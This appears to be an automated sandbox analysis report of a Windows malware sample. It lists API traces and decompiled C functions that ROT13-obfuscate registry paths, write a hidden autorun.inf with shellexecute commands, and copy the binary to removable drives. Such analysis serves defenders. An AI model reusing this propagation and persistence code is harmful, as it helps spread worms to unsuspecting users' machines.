                                                                            • Part of subcall function 10002209: memset.MSVCRT ref: 10002226
                                                                            • Part of subcall function 10002209: GetSystemDirectoryA.KERNEL32 ref: 10002232
                                                                            • Part of subcall function 10002209: lstrlen.KERNEL32 ref: 1000223D
                                                                            • Part of subcall function 10002209: lstrcat.KERNEL32 ref: 10002257
                                                                            • Part of subcall function 10002209: lstrcat.KERNEL32 ref: 10002269
                                                                          • filetyt.SHERVANS ref: 10002D9E
                                                                            • Part of subcall function 1000271B: fopen.MSVCRT ref: 1000272F
                                                                            • Part of subcall function 1000271B: fclose.MSVCRT ref: 10002740
                                                                          • Sleep.KERNEL32 ref: 10002DBD
                                                                          • GetDriveTypeA.KERNEL32 ref: 10002DD4
                                                                          • memset.MSVCRT ref: 10002DFE
                                                                          • _mbscat.MSVCRT ref: 10002E11
                                                                          • lstrlen.KERNEL32 ref: 10002E19
                                                                          • lstrcat.KERNEL32 ref: 10002E36
                                                                          • _mbscat.MSVCRT ref: 10002E49
                                                                          • SetErrorMode.KERNEL32 ref: 10002E55
                                                                          • CopyFileA.KERNEL32 ref: 10002E72
                                                                          • SetFileAttributesA.KERNEL32 ref: 10002E85
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.259076355.0000000010001000.00000040.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                                          • Associated: 00000000.00000002.259070497.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000000.00000002.259083925.0000000010005000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000000.00000002.259107376.0000000010008000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000000.00000002.259117363.000000001000A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000000.00000002.259125606.000000001000B000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000000.00000002.259132398.000000001000C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_10000000_GxELazkKkG.jbxd
                                                                          Similarity
                                                                          • API ID: lstrcatrot13$FileOpen_mbscatlstrlenmemset$AttributesCloseCopyDirectoryDriveErrorModeQuerySleepSystemTypeValueadd_system_direcrotyfclosefiletytfopenget_dwordmemcpyrot13c
                                                                          • String ID: `$Q
                                                                          • API String ID: 1565552690-2154725097
                                                                          • Opcode ID: ca6b7556f4e4c0b07e28bf64fc42607d1be749f81df0f6860581cb1cef415f20
                                                                          • Instruction ID: 3c753f9fe4a5df1170e053b3461346bedc4f7c817325d12f88918a50ebfe7554
                                                                          • Opcode Fuzzy Hash: ca6b7556f4e4c0b07e28bf64fc42607d1be749f81df0f6860581cb1cef415f20
                                                                          • Instruction Fuzzy Hash: D84182B4408B459BE711EF24D98539FBBF4EF80381F41882DE8C857209D779A988CB83
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 97 40b0e0-40b0f4 98 40b0f6-40b0fd 97->98 99 40b0fe-40b19b FindAtomA 97->99 100 40b1a1-40b1b1 malloc 99->100 101 40b2dc-40b2e1 call 40b040 99->101 102 40b310-40b315 abort 100->102 103 40b1b7-40b22e 100->103 107 40b2e3-40b300 101->107 106 40b230-40b247 103->106 106->106 108 40b249-40b2bd AddAtomA 106->108 109 40b301-40b30c call 40b040 108->109 110 40b2bf 108->110 109->110 115 40b30e 109->115 112 40b2c1-40b2c3 110->112 112->107 114 40b2c5-40b2d9 ??3@YAXPAX@Z FindAtomA 112->114 114->101 115->112
                                                                          C-Code - Quality: 51%
                                                                          			E0040B0E0(void* __eax) {
                                                                          				void* _v16;
                                                                          				short _v44;
                                                                          				intOrPtr _v48;
                                                                          				intOrPtr _v52;
                                                                          				intOrPtr _v56;
                                                                          				intOrPtr _v60;
                                                                          				intOrPtr _v64;
                                                                          				intOrPtr _v68;
                                                                          				intOrPtr _v72;
                                                                          				intOrPtr _v76;
                                                                          				intOrPtr _v80;
                                                                          				intOrPtr _v84;
                                                                          				intOrPtr _v88;
                                                                          				intOrPtr _v92;
                                                                          				intOrPtr _v96;
                                                                          				intOrPtr _v100;
                                                                          				intOrPtr _v104;
                                                                          				char _v108;
                                                                          				short _v124;
                                                                          				intOrPtr _v128;
                                                                          				intOrPtr _v132;
                                                                          				intOrPtr _v136;
                                                                          				intOrPtr _v140;
                                                                          				intOrPtr _v144;
                                                                          				intOrPtr _v148;
                                                                          				intOrPtr _v152;
                                                                          				intOrPtr _v156;
                                                                          				char _v188;
                                                                          				int _v192;
                                                                          				void* __ebx;
                                                                          				char _t51;
                                                                          				intOrPtr _t52;
                                                                          				intOrPtr _t53;
                                                                          				intOrPtr _t54;
                                                                          				intOrPtr _t55;
                                                                          				intOrPtr _t56;
                                                                          				intOrPtr _t57;
                                                                          				intOrPtr _t58;
                                                                          				signed int _t61;
                                                                          				intOrPtr _t64;
                                                                          				void* _t65;
                                                                          				intOrPtr _t71;
                                                                          				intOrPtr _t73;
                                                                          				signed char _t75;
                                                                          				char _t78;
                                                                          				intOrPtr _t79;
                                                                          				intOrPtr _t80;
                                                                          				intOrPtr _t81;
                                                                          				intOrPtr _t82;
                                                                          				intOrPtr _t83;
                                                                          				intOrPtr _t84;
                                                                          				intOrPtr _t85;
                                                                          				signed short _t88;
                                                                          				void* _t90;
                                                                          				void* _t92;
                                                                          				signed int _t93;
                                                                          				signed int _t94;
                                                                          				void* _t96;
                                                                          				signed int _t101;
                                                                          				intOrPtr _t103;
                                                                          				intOrPtr _t104;
                                                                          				void* _t105;
                                                                          				signed int _t106;
                                                                          				signed int _t109;
                                                                          				signed int _t110;
                                                                          				signed int* _t111;
                                                                          				intOrPtr* _t112;
                                                                          				intOrPtr* _t114;
                                                                          				signed int* _t115;
                                                                          
                                                                          				_t94 =  *0x418284;
                                                                          				if(_t94 == 0) {
                                                                          					_v108 = 0x41414141;
                                                                          					_t51 = "-LIBGCCW32-EH-2-SJLJ-GTHR-MINGW32"; // 0x42494c2d
                                                                          					_t110 =  &_v108;
                                                                          					_v104 = 0x41414141;
                                                                          					_v100 = 0x41414141;
                                                                          					_v76 = _t51;
                                                                          					_t52 = M004131B4; // 0x57434347
                                                                          					_v96 = 0x41414141;
                                                                          					_v92 = 0x41414141;
                                                                          					_v72 = _t52;
                                                                          					_t53 = M004131B8; // 0x452d3233
                                                                          					_v88 = 0x41414141;
                                                                          					_v84 = 0x41414141;
                                                                          					_v68 = _t53;
                                                                          					_t54 = M004131BC; // 0x2d322d48
                                                                          					_v80 = 0x41414141;
                                                                          					_v64 = _t54;
                                                                          					_t55 = M004131C0; // 0x4a4c4a53
                                                                          					_v60 = _t55;
                                                                          					_t56 = M004131C4; // 0x4854472d
                                                                          					_v56 = _t56;
                                                                          					_t57 = M004131C8; // 0x494d2d52
                                                                          					_v52 = _t57;
                                                                          					_t58 =  *0x4131cc; // 0x3357474e
                                                                          					_v48 = _t58;
                                                                          					_v44 =  *0x4131d0 & 0x0000ffff;
                                                                          					 *_t111 = _t110;
                                                                          					_t61 = FindAtomA(??) & 0x0000ffff;
                                                                          					_t112 = _t111 - 4;
                                                                          					_v192 = _t61;
                                                                          					if(_t61 != 0) {
                                                                          						L10:
                                                                          						_t93 = E0040B040(_t61, _t92);
                                                                          					} else {
                                                                          						 *_t112 = 0x3c;
                                                                          						_t65 = malloc(??);
                                                                          						_t93 = _t65;
                                                                          						if(_t65 == 0) {
                                                                          							abort();
                                                                          							0;
                                                                          							0;
                                                                          							_push(_t94);
                                                                          							_t96 = _t112 + 8;
                                                                          							while(_t65 >= 0x1000) {
                                                                          								_t96 = _t96 - 0x1000;
                                                                          								_t65 = _t65 - 0x1000;
                                                                          							}
                                                                          							goto __eax;
                                                                          						}
                                                                          						asm("cld");
                                                                          						memset(_t65, _v192, 0xf << 2);
                                                                          						_t114 = _t112 + 0xc;
                                                                          						 *((intOrPtr*)(_t93 + 4)) = L0040C278;
                                                                          						_t101 = 1;
                                                                          						 *((intOrPtr*)(_t93 + 8)) = E0040B030;
                                                                          						 *_t93 = 0x3c;
                                                                          						 *((intOrPtr*)(_t93 + 0x28)) = 0;
                                                                          						 *((intOrPtr*)(_t93 + 0x14)) =  *0x418254;
                                                                          						_t71 =  *0x40d4f0; // 0x0
                                                                          						 *((intOrPtr*)(_t93 + 0x18)) =  *0x418258;
                                                                          						_t103 =  *0x40d4f4; // 0xffffffff
                                                                          						 *((intOrPtr*)(_t93 + 0x1c)) = _t71;
                                                                          						 *((intOrPtr*)(_t93 + 0x20)) = _t103;
                                                                          						 *((intOrPtr*)(_t93 + 0x30)) = 0xffffffff;
                                                                          						 *((intOrPtr*)(_t93 + 0x2c)) =  *0x418264;
                                                                          						_t104 =  *0x40d4fc; // 0xffffffff
                                                                          						_t73 =  *0x40d4f8; // 0x0
                                                                          						 *((intOrPtr*)(_t93 + 0x38)) = _t104;
                                                                          						_t105 = 0x1f;
                                                                          						 *((intOrPtr*)(_t93 + 0x34)) = _t73;
                                                                          						do {
                                                                          							_t75 = _t93 & _t101;
                                                                          							asm("sbb eax, eax");
                                                                          							_t101 = _t101 + _t101;
                                                                          							 *((char*)(_t105 +  &_v188)) = (_t75 & 0x00000020) + 0x41;
                                                                          							_t105 = _t105 - 1;
                                                                          						} while (_t105 >= 0);
                                                                          						_t78 = "-LIBGCCW32-EH-2-SJLJ-GTHR-MINGW32"; // 0x42494c2d
                                                                          						_v156 = _t78;
                                                                          						_t79 = M004131B4; // 0x57434347
                                                                          						_v152 = _t79;
                                                                          						_t80 = M004131B8; // 0x452d3233
                                                                          						_v148 = _t80;
                                                                          						_t81 = M004131BC; // 0x2d322d48
                                                                          						_v144 = _t81;
                                                                          						_t82 = M004131C0; // 0x4a4c4a53
                                                                          						_v140 = _t82;
                                                                          						_t83 = M004131C4; // 0x4854472d
                                                                          						_v136 = _t83;
                                                                          						_t84 = M004131C8; // 0x494d2d52
                                                                          						_v132 = _t84;
                                                                          						_t85 =  *0x4131cc; // 0x3357474e
                                                                          						_v128 = _t85;
                                                                          						_v124 =  *0x4131d0 & 0x0000ffff;
                                                                          						 *_t114 =  &_v188; // executed
                                                                          						_t88 = AddAtomA(??); // executed
                                                                          						_t109 = _t88 & 0x0000ffff;
                                                                          						_t115 = _t114 - 4;
                                                                          						if(_t109 != 0) {
                                                                          							_t90 = E0040B040(_t109, _t93);
                                                                          							_t106 = _t109;
                                                                          							if(_t90 != _t93) {
                                                                          								goto L7;
                                                                          							} else {
                                                                          								goto L8;
                                                                          							}
                                                                          							goto L19;
                                                                          						} else {
                                                                          							L7:
                                                                          							_t106 = 0;
                                                                          						}
                                                                          						L8:
                                                                          						if(_t106 == 0) {
                                                                          							 *_t115 = _t93;
                                                                          							L0040C1C8();
                                                                          							 *_t115 = _t110;
                                                                          							_t61 = FindAtomA(??) & 0x0000ffff;
                                                                          							goto L10;
                                                                          						}
                                                                          					}
                                                                          					 *0x418284 = _t93;
                                                                          					_t46 = _t93 + 4; // 0x4
                                                                          					 *0x418274 = _t46;
                                                                          					_t47 = _t93 + 8; // 0x8
                                                                          					_t64 = _t47;
                                                                          					 *0x418294 = _t64;
                                                                          					return _t64;
                                                                          				} else {
                                                                          					return __eax;
                                                                          				}
                                                                          				L19:
                                                                          			}








































































                                                                          0x0040b0ec
                                                                          0x0040b0f4
                                                                          0x0040b0fe
                                                                          0x0040b105
                                                                          0x0040b10a
                                                                          0x0040b10d
                                                                          0x0040b114
                                                                          0x0040b11b
                                                                          0x0040b11e
                                                                          0x0040b123
                                                                          0x0040b12a
                                                                          0x0040b131
                                                                          0x0040b134
                                                                          0x0040b139
                                                                          0x0040b140
                                                                          0x0040b147
                                                                          0x0040b14a
                                                                          0x0040b14f
                                                                          0x0040b156
                                                                          0x0040b159
                                                                          0x0040b15e
                                                                          0x0040b161
                                                                          0x0040b166
                                                                          0x0040b169
                                                                          0x0040b16e
                                                                          0x0040b171
                                                                          0x0040b176
                                                                          0x0040b180
                                                                          0x0040b184
                                                                          0x0040b18d
                                                                          0x0040b190
                                                                          0x0040b195
                                                                          0x0040b19b
                                                                          0x0040b2dc
                                                                          0x0040b2e1
                                                                          0x0040b1a1
                                                                          0x0040b1a1
                                                                          0x0040b1a8
                                                                          0x0040b1af
                                                                          0x0040b1b1
                                                                          0x0040b310
                                                                          0x0040b31b
                                                                          0x0040b31f
                                                                          0x0040b320
                                                                          0x0040b323
                                                                          0x0040b326
                                                                          0x0040b32d
                                                                          0x0040b336
                                                                          0x0040b336
                                                                          0x0040b34b
                                                                          0x0040b34b
                                                                          0x0040b1b7
                                                                          0x0040b1c5
                                                                          0x0040b1c5
                                                                          0x0040b1c7
                                                                          0x0040b1ce
                                                                          0x0040b1d3
                                                                          0x0040b1df
                                                                          0x0040b1eb
                                                                          0x0040b1f2
                                                                          0x0040b1f5
                                                                          0x0040b1fa
                                                                          0x0040b1fd
                                                                          0x0040b203
                                                                          0x0040b20b
                                                                          0x0040b20e
                                                                          0x0040b215
                                                                          0x0040b218
                                                                          0x0040b21e
                                                                          0x0040b223
                                                                          0x0040b226
                                                                          0x0040b22b
                                                                          0x0040b230
                                                                          0x0040b232
                                                                          0x0040b237
                                                                          0x0040b23b
                                                                          0x0040b23f
                                                                          0x0040b246
                                                                          0x0040b246
                                                                          0x0040b249
                                                                          0x0040b24e
                                                                          0x0040b254
                                                                          0x0040b259
                                                                          0x0040b25f
                                                                          0x0040b264
                                                                          0x0040b26a
                                                                          0x0040b26f
                                                                          0x0040b275
                                                                          0x0040b27a
                                                                          0x0040b280
                                                                          0x0040b285
                                                                          0x0040b28b
                                                                          0x0040b290
                                                                          0x0040b293
                                                                          0x0040b298
                                                                          0x0040b2a2
                                                                          0x0040b2ac
                                                                          0x0040b2af
                                                                          0x0040b2b5
                                                                          0x0040b2b8
                                                                          0x0040b2bd
                                                                          0x0040b303
                                                                          0x0040b30a
                                                                          0x0040b30c
                                                                          0x00000000
                                                                          0x0040b30e
                                                                          0x00000000
                                                                          0x0040b30e
                                                                          0x00000000
                                                                          0x0040b2bf
                                                                          0x0040b2bf
                                                                          0x0040b2bf
                                                                          0x0040b2bf
                                                                          0x0040b2c1
                                                                          0x0040b2c3
                                                                          0x0040b2c5
                                                                          0x0040b2c8
                                                                          0x0040b2cd
                                                                          0x0040b2d9
                                                                          0x00000000
                                                                          0x0040b2d9
                                                                          0x0040b2c3
                                                                          0x0040b2e3
                                                                          0x0040b2e9
                                                                          0x0040b2ec
                                                                          0x0040b2f1
                                                                          0x0040b2f1
                                                                          0x0040b2f4
                                                                          0x0040b300
                                                                          0x0040b0f6
                                                                          0x0040b0fd
                                                                          0x0040b0fd
                                                                          0x00000000

                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.258661614.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.258647902.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258702114.0000000000419000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258761058.000000000041C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258775162.0000000000420000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258781881.0000000000423000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258787781.0000000000425000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258794500.0000000000429000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258801486.000000000042D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258809125.0000000000431000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258816744.0000000000435000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258822560.0000000000436000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258828695.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_GxELazkKkG.jbxd
                                                                          Similarity
                                                                          • API ID: Atom$Findmalloc
                                                                          • String ID: -LIBGCCW32-EH-2-SJLJ-GTHR-MINGW32$AAAA$AAAA$AAAA$AAAA$AAAA$AAAA$AAAA$AAAA
                                                                          • API String ID: 822928543-4229226183
                                                                          • Opcode ID: b996283103914c8c547a0f5b047768b3d30837a48cc31e111859e5c4cfbbb589
                                                                          • Instruction ID: 5c8a408c4dcb306db70316dfdce650025cae950a5a82f7704b97cd34435e599e
                                                                          • Opcode Fuzzy Hash: b996283103914c8c547a0f5b047768b3d30837a48cc31e111859e5c4cfbbb589
                                                                          • Instruction Fuzzy Hash: DC6107B4A00218DFDB50CFA9E9C4699BBF0FB48311F1481BAD818EB395E7349945CF49
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Control-flow Graph

                                                                          C-Code - Quality: 24%
                                                                          			E10002806(intOrPtr __ebx, signed int __edx, intOrPtr __edi, intOrPtr __esi, void* __eflags) {
                                                                          				intOrPtr _v8;
                                                                          				intOrPtr _v12;
                                                                          				intOrPtr _v16;
                                                                          				char _v188;
                                                                          				char _v316;
                                                                          				char _v364;
                                                                          				char _v572;
                                                                          				long _v576;
                                                                          				void* _v588;
                                                                          				void* _v592;
                                                                          				void* _v596;
                                                                          				void* _v600;
                                                                          				void* _v604;
                                                                          				void* _v608;
                                                                          				void* _v612;
                                                                          				char* _v616;
                                                                          				void* _t46;
                                                                          				int _t50;
                                                                          				signed int _t52;
                                                                          				void* _t63;
                                                                          				void* _t64;
                                                                          				void* _t66;
                                                                          				signed int _t73;
                                                                          				CHAR* _t76;
                                                                          				void* _t82;
                                                                          				void** _t83;
                                                                          
                                                                          				_t73 = __edx;
                                                                          				_v16 = __ebx;
                                                                          				_v12 = __esi;
                                                                          				_v8 = __edi;
                                                                          				_v616 = "Fbsgjner\\Zvpebfbsg\\Jvaqbjf\\PheeragIrefvba\\Rkcybere\\ihyaiby32\\Irefvba";
                                                                          				_t63 =  &_v316;
                                                                          				 *_t83 = _t63;
                                                                          				E10001F26();
                                                                          				_v608 = 0x14;
                                                                          				_v612 = 0x100060a4;
                                                                          				_v616 = "namecp";
                                                                          				 *_t83 = _t63; // executed
                                                                          				_t46 = E10001F57(_t63); // executed
                                                                          				if(_t46 == 0) {
                                                                          					 *_t83 = 0x100060a4;
                                                                          					E100024A2();
                                                                          					asm("cld");
                                                                          					asm("repne scasb");
                                                                          					 *0x100060A3 = 0x6578652e;
                                                                          					 *0x10BB3C54 = 0;
                                                                          					_v612 = 0x100060a4;
                                                                          					_v616 = "namecp";
                                                                          					 *_t83 = _t63; // executed
                                                                          					E1000274E(); // executed
                                                                          				}
                                                                          				_v616 = "fngbeanf.qyy";
                                                                          				_t64 =  &_v364;
                                                                          				 *_t83 = _t64;
                                                                          				E10001F26();
                                                                          				_v612 = _t64;
                                                                          				_v616 = 0x96;
                                                                          				 *_t83 =  &_v188;
                                                                          				E10002209();
                                                                          				_t76 =  &_v188;
                                                                          				 *_t83 = _t76; // executed
                                                                          				_t50 = E1000271B(); // executed
                                                                          				if(_t50 == 0) {
                                                                          					_v608 = 0x100060a4;
                                                                          					_v612 = 0x100060a4;
                                                                          					_v616 = "[autorun]\r\nshellexecute=%s\r\nicon=%%SystemRoot%%\\system32\\SHELL32.dll,4\r\naction=Open folder to view files\r\nshell\\default=Open\r\nshell\\default\\command=%s\r\nshell=default";
                                                                          					_t82 =  &_v572;
                                                                          					 *_t83 = _t82;
                                                                          					wsprintfA(??, ??);
                                                                          					_t52 = CreateFileA(_t76, 0x40000000, 0, 0, 2, 0x80, 0); // executed
                                                                          					_t66 = _t52;
                                                                          					_t50 = _t52 & 0xffffff00 | _t52 == 0xffffffff | _t73 & 0xffffff00 | _t66 == 0x00000000;
                                                                          					if((_t50 & 0x00000001) == 0) {
                                                                          						asm("cld");
                                                                          						asm("repne scasb");
                                                                          						WriteFile(_t66, _t82, 0xbadbac,  &_v576, 0); // executed
                                                                          						CloseHandle(_t66);
                                                                          						_t50 = SetFileAttributesA( &_v188, 2); // executed
                                                                          					}
                                                                          				}
                                                                          				return _t50;
                                                                          			}





























                                                                          0x10002806
                                                                          0x1000280f
                                                                          0x10002812
                                                                          0x10002815
                                                                          0x10002818
                                                                          0x10002820
                                                                          0x10002826
                                                                          0x10002829
                                                                          0x1000282e
                                                                          0x10002836
                                                                          0x1000283e
                                                                          0x10002846
                                                                          0x10002849
                                                                          0x10002850
                                                                          0x10002852
                                                                          0x10002859
                                                                          0x10002863
                                                                          0x1000286b
                                                                          0x10002870
                                                                          0x1000287a
                                                                          0x10002881
                                                                          0x10002889
                                                                          0x10002891
                                                                          0x10002894
                                                                          0x10002894
                                                                          0x10002899
                                                                          0x100028a1
                                                                          0x100028a7
                                                                          0x100028aa
                                                                          0x100028af
                                                                          0x100028b3
                                                                          0x100028c1
                                                                          0x100028c4
                                                                          0x100028c9
                                                                          0x100028cf
                                                                          0x100028d2
                                                                          0x100028d9
                                                                          0x100028df
                                                                          0x100028e7
                                                                          0x100028ef
                                                                          0x100028f7
                                                                          0x100028fd
                                                                          0x10002900
                                                                          0x10002938
                                                                          0x10002940
                                                                          0x1000294d
                                                                          0x10002951
                                                                          0x10002953
                                                                          0x1000295d
                                                                          0x1000297f
                                                                          0x1000298a
                                                                          0x100029a3
                                                                          0x100029a8
                                                                          0x10002951
                                                                          0x100029b7

                                                                          APIs
                                                                          • rot13.SHERVANS ref: 10002829
                                                                            • Part of subcall function 10001F26: rot13c.SHERVANS ref: 10001F40
                                                                          • Get_Reg_SZ.SHERVANS ref: 10002849
                                                                            • Part of subcall function 10001F57: RegOpenKeyExA.ADVAPI32 ref: 10001F90
                                                                            • Part of subcall function 10001F57: RegOpenKeyExA.ADVAPI32 ref: 10001FBE
                                                                            • Part of subcall function 10001F57: RegQueryValueExA.ADVAPI32 ref: 10001FF9
                                                                            • Part of subcall function 10001F57: RegCloseKey.ADVAPI32 ref: 10002009
                                                                          • sss_rans.SHERVANS ref: 10002859
                                                                            • Part of subcall function 100024A2: GetLocalTime.KERNEL32 ref: 100024F9
                                                                            • Part of subcall function 100024A2: GetTickCount.KERNEL32 ref: 10002501
                                                                            • Part of subcall function 100024A2: srand.MSVCRT ref: 10002509
                                                                            • Part of subcall function 100024A2: rand.MSVCRT ref: 10002512
                                                                            • Part of subcall function 100024A2: GetTickCount.KERNEL32 ref: 10002519
                                                                            • Part of subcall function 100024A2: srand.MSVCRT ref: 10002521
                                                                            • Part of subcall function 100024A2: rand.MSVCRT ref: 1000252D
                                                                            • Part of subcall function 100024A2: GetTickCount.KERNEL32 ref: 10002546
                                                                            • Part of subcall function 100024A2: srand.MSVCRT ref: 1000254E
                                                                            • Part of subcall function 100024A2: rand.MSVCRT ref: 10002553
                                                                            • Part of subcall function 100024A2: GetTickCount.KERNEL32 ref: 1000256E
                                                                            • Part of subcall function 100024A2: srand.MSVCRT ref: 10002576
                                                                            • Part of subcall function 100024A2: rand.MSVCRT ref: 1000257B
                                                                            • Part of subcall function 100024A2: GetTickCount.KERNEL32 ref: 10002596
                                                                            • Part of subcall function 100024A2: srand.MSVCRT ref: 1000259E
                                                                            • Part of subcall function 100024A2: rand.MSVCRT ref: 100025A3
                                                                            • Part of subcall function 100024A2: GetTickCount.KERNEL32 ref: 100025BE
                                                                            • Part of subcall function 100024A2: srand.MSVCRT ref: 100025C6
                                                                            • Part of subcall function 100024A2: rand.MSVCRT ref: 100025CB
                                                                            • Part of subcall function 100024A2: GetTickCount.KERNEL32 ref: 100025E6
                                                                            • Part of subcall function 100024A2: srand.MSVCRT ref: 100025EE
                                                                            • Part of subcall function 100024A2: rand.MSVCRT ref: 100025F3
                                                                            • Part of subcall function 100024A2: GetLocalTime.KERNEL32 ref: 10002605
                                                                            • Part of subcall function 100024A2: _itoa.MSVCRT ref: 10002622
                                                                            • Part of subcall function 100024A2: rand.MSVCRT ref: 10002627
                                                                          • Write_REG_SZ.SHERVANS ref: 10002894
                                                                            • Part of subcall function 1000274E: RegOpenKeyExA.ADVAPI32 ref: 1000277E
                                                                            • Part of subcall function 1000274E: RegOpenKeyExA.ADVAPI32 ref: 100027AC
                                                                            • Part of subcall function 1000274E: lstrlen.KERNEL32 ref: 100027BB
                                                                            • Part of subcall function 1000274E: RegSetValueExA.ADVAPI32 ref: 100027E9
                                                                            • Part of subcall function 1000274E: RegCloseKey.ADVAPI32 ref: 100027F7
                                                                          • rot13.SHERVANS ref: 100028AA
                                                                          • add_system_direcroty.SHERVANS ref: 100028C4
                                                                          • filetyt.SHERVANS ref: 100028D2
                                                                          • wsprintfA.USER32 ref: 10002900
                                                                          • CreateFileA.KERNEL32 ref: 10002938
                                                                          • WriteFile.KERNEL32 ref: 1000297F
                                                                          • CloseHandle.KERNEL32 ref: 1000298A
                                                                          • SetFileAttributesA.KERNEL32 ref: 100029A3
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.259076355.0000000010001000.00000040.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                                          • Associated: 00000000.00000002.259070497.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000000.00000002.259083925.0000000010005000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000000.00000002.259107376.0000000010008000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000000.00000002.259117363.000000001000A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000000.00000002.259125606.000000001000B000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000000.00000002.259132398.000000001000C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_10000000_GxELazkKkG.jbxd
                                                                          Similarity
                                                                          • API ID: rand$CountTicksrand$Open$CloseFile$LocalTimeValuerot13$AttributesCreateGet_HandleQueryReg_WriteWrite__itoaadd_system_direcrotyfiletytlstrlenrot13csss_ranswsprintf
                                                                          • String ID: $Q$.exe
                                                                          • API String ID: 3664041036-2176984968
                                                                          • Opcode ID: 0ce48c875dcb9776822b96dc49c550283a6cc132f5ca885be87a417cd2aebe61
                                                                          • Instruction ID: 6304da7cd2528330332a3f5809cdbcaba00ebaed1578c57c0e7df17c251e0487
                                                                          • Opcode Fuzzy Hash: 0ce48c875dcb9776822b96dc49c550283a6cc132f5ca885be87a417cd2aebe61
                                                                          • Instruction Fuzzy Hash: CF417CB84087459BE700EF64C58535EBBF4EF84390F50896CE4995B386D7B99A88CF83
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Control-flow Graph

                                                                          APIs
                                                                          • rot13.SHERVANS ref: 10002A7C
                                                                            • Part of subcall function 10001F26: rot13c.SHERVANS ref: 10001F40
                                                                          • add_system_direcroty.SHERVANS ref: 10002A96
                                                                            • Part of subcall function 10002209: memset.MSVCRT ref: 10002226
                                                                            • Part of subcall function 10002209: GetSystemDirectoryA.KERNEL32 ref: 10002232
                                                                            • Part of subcall function 10002209: lstrlen.KERNEL32 ref: 1000223D
                                                                            • Part of subcall function 10002209: lstrcat.KERNEL32 ref: 10002257
                                                                            • Part of subcall function 10002209: lstrcat.KERNEL32 ref: 10002269
                                                                          • rot13.SHERVANS ref: 10002AA6
                                                                          • add_system_direcroty.SHERVANS ref: 10002AC0
                                                                          • Sleep.KERNEL32 ref: 10002AD8
                                                                          • memset.MSVCRT ref: 10002AF3
                                                                          • CreateProcessA.KERNEL32 ref: 10002B5E
                                                                          • CopyFileA.KERNEL32 ref: 10002B83
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.259076355.0000000010001000.00000040.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                                          • Associated: 00000000.00000002.259070497.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000000.00000002.259083925.0000000010005000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000000.00000002.259107376.0000000010008000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000000.00000002.259117363.000000001000A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000000.00000002.259125606.000000001000B000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000000.00000002.259132398.000000001000C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_10000000_GxELazkKkG.jbxd
                                                                          Similarity
                                                                          • API ID: add_system_direcrotylstrcatmemsetrot13$CopyCreateDirectoryFileProcessSleepSystemlstrlenrot13c
                                                                          • String ID: D$D$Q
                                                                          • API String ID: 4246308054-1586927259
                                                                          • Opcode ID: 8626d89cb3255881e73716c3260a54c89da476df512f70a198ef19893bc3a0c4
                                                                          • Instruction ID: 487f3aaf9e3853622048ce0787bcf5f21f0a9e41bca69b1cddbbffefc67ddced
                                                                          • Opcode Fuzzy Hash: 8626d89cb3255881e73716c3260a54c89da476df512f70a198ef19893bc3a0c4
                                                                          • Instruction Fuzzy Hash: E731F9B48093159AE710DF20C98539FBBF4FF44794F40885DE88857245E7BAA688CF83
                                                                          Uniqueness

